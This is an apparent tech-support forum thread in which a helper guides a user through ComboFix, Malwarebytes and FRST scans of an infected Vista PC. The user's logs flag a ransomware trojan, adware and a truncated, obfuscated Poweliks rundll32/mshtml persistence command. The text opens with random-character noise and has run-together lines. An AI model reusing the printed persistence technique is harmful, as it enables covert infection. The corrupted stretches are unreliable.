Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@.((((((((((((((((((((((((( Files Created 
from 2014-07-24 to 2014-08-24 )))))))))))))))))))))))))))))))
.
.
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ HPSLPSVC
hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program 
files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]..------- Supplementary Scan -------.uStart Page = hxxp://www.google.com/uInternet Settings,ProxyOverride = *.local;<local>TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3..**************************************************************************.catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.netRootkit scan 2014-08-24 15:40Windows 6.0.6002 Service Pack 2 NTFS.scanning hidden processes ... .scanning hidden autostart entries ... .scanning hidden files ... .scan completed successfullyhidden files: 0.**************************************************************************.--------------------- LOCKED REGISTRY KEYS ---------------------.[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984).------------------------ Other Running Processes ------------------------.c:\windows\system32\Ati2evxx.exec:\windows\system32\Ati2evxx.exec:\program files\Dell\DellDock\DockLogin.exec:\windows\system32\WLANExt.exec:\program files\Common Files\Adobe\ARM\1.0\armsvc.exec:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exec:\program files\AVG\AVG10\avgfws.exec:\program files\AVG\AVG10\avgwdsvc.exec:\program files\Bonjour\mDNSResponder.exec:\windows\dwrcs\DWRCS.EXEc:\windows\system32\lxblcoms.exec:\windows\system32\msiexec.exec:\program files\HTC\Internet Pass-Through\PassThruSvr.exec:\program files\Sony\PMB\PMBDeviceInfoProvider.exec:\program files\NETGEAR\WNA1100\WifiSvc.exec:\windows\system32\WUDFHost.exec:\program files\AVG\AVG10\avgnsx.exec:\program files\Dell\DellDock\DellDock.exec:\program files\Glary Utilities 5\Integrator.exec:\windows\RtHDVCpl.exec:\windows\System32\rundll32.exec:\program files\ActivIdentity\ActivClient\acsagent.exec:\program files\HP\Digital Imaging\bin\hpqtra08.exec:\program 
files\NETGEAR\WNA1100\WNA1100.exe
c:\program files\Microsoft Office\Office12\ONENOTEM.EXE
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\windows\ehome\ehmsas.exe
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe
c:\\?\c:\windows\system32\wbem\WMIADAP.EXE
c:\program files\Windows Media Player\wmpnetwk.exe
c:\windows\system32\rundll32.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
.
**************************************************************************
.
Completion time: 2014-08-24 15:45:51 - machine was rebooted
ComboFix-quarantined-files.txt 2014-08-24 19:45
ComboFix2.txt 2014-08-23 20:16
ComboFix3.txt 2014-08-23 18:22
.
Pre-Run: 238,198,915,072 bytes free
Post-Run: 238,199,603,200 bytes free
.
- - End Of File - - 836BEC6E629D99F479DEE501CB2CA8455C616939100B85E558DA92B899A0FC36
Naathim Posted August 24, 2014 ID:870721

Good so far.

Scan with Malwarebytes' Anti-Malware
Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.
First of all, select Update.
Once updated, click the Settings tab, in the left panel choose Detections & protection and tick Scan for rootkits.
Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
Upon completion of the scan (or after the reboot), click the History tab.
Click Application Logs and double-click the Scan Log.
At the bottom click Export and choose Text file.
Save the file to your desktop and include its content in your next reply.

Scan with Farbar Recovery Scan Tool
Please re-run Farbar Recovery Scan Tool.
Right-click on the icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.
jjoyner1985 Posted August 25, 2014 Author ID:871049

I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs:

MBAM

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 8/25/2014
Scan Time: 8:28:24 AM
Logfile: MBAM.txt
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.08.25.02
Rootkit Database: v2014.08.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: savas.kyriakidis

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 355293
Time Elapsed: 27 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 4
PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26],
PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26],
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [74251faa205b3bfbe62350acc2409a66],
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [990042871b6054e235d494683ac823dd],

Registry Values: 1
Trojan.Ransom.Gen, HKU\S-1-5-21-3726736968-409882640-1958551794-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IrfuqApivh, regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat", Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Trojan.Ransom.Gen, C:\ProgramData\IrfuqApivh\IrfuqApivh.dat, Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85],

Physical Sectors: 0
(No malicious items detected)

(end)

FRST

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 09:47:13
Running from G:\
Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.)
C:\Program Files\AVG\AVG10\avgwdsvc.exe(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE( ) C:\Windows\System32\lxblcoms.exe() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe(Microsoft Corporation) C:\Windows\ehome\ehtray.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe(Advanced Micro Devices Inc.) 
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)HKLM Group Policy 
restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTIONHKLM\...\Policies\Explorer: [useDefaultTile] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => 
C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTIONHKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnkShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnkShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnkShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnkShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: 